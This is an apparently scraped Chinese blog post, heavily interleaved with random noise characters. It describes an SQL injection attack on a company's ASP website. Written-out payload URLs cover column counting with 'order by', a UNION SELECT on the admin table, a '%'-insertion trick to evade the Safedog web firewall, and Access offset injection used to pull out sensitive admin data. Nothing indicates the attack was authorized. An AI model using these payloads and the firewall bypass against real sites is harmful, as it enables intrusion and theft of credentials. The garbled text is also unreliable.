打开网站,一个企业站。; b; ^# C7 D$ x/ q5 P: a: [. ~
' S3 m2 x- i8 p& H+ e T+ [
2 P1 V5 r$ H6 a+ b( x顺手加个admin, V) _ q$ ]% n7 _% j; l3 ?& }
y( c2 W; I; g# C4 b3 O. H* d
5 `2 \2 w! Q" d8 w( g% r默认后台。
# g6 m8 h4 y" n6 [1 b- ^5 Z回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。
8 y: r7 Q, K" [) v3 J7 R1 |2 J6 p
) }5 o4 T! x3 Q& r2 J, _+ z3 A ^! o6 h- j2 a/ N
, s, Q7 m+ W1 L& C所以就不用御剑扫了,待会直接封IP。% Y& F* }7 k, c. Q* H# V
. A. n( Z, |- L: c2 c用order by语句判断是否存在注入。
0 H; `) F* O0 v' fhttp://www.xxx.com /product_show.asp?id=997 order by 1; H) c6 D6 C6 w3 Y8 e& v, Z: I' W
http://www.xxx.com /product_show.asp?id=997 order by 100
: t$ r8 D/ ?& w( G) d! V现在存在注入,经测试后发现是9个字段。! x$ c* g0 \, M0 ?
, }& g* a/ J1 @接下来进行联合查询,猜是否存在admin表。
% M1 l+ L; X0 M0 x( V+ x6 z: M! @http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。
( C1 w; N" x5 j0 ~* o0 o" {4 T4 C D0 g* l; \; F
; \& O# E E. U# |; Q8 y* d5 w
; |6 U$ a8 Q1 I7 Y' D9 n$ [1 ^7 c在select中间加个%,se%lect绕过安全狗。7 y, _( P7 M2 _$ |' M c5 H. Y
* w0 {1 q4 l/ S3 S
2 z0 K: Z9 _& g I( ?" d2 O发现存在admin表,然后开始手工猜常用的字段。
$ x9 m3 a& q0 a- I) [) G纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
2 j# T/ C0 C4 J$ l$ p8 c( c' }
' a7 p% x* e9 l' b' f5 _, M* V突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。9 w5 R* A/ I ^: ]* I
1 q+ G9 \, Y8 _/ g. M
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。- T, g4 {8 T' @! t9 X! j
http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
* B) X: I9 w% q; D/ O. o' G. @- E好了,敏感内容出显了。
# @) R: u! H: i# c6 }/ p {+ B4 V
: k% D2 s5 z) F% u
+ z" }: x1 w1 m) b1 b" m# B! {, |8 |3 S; m
|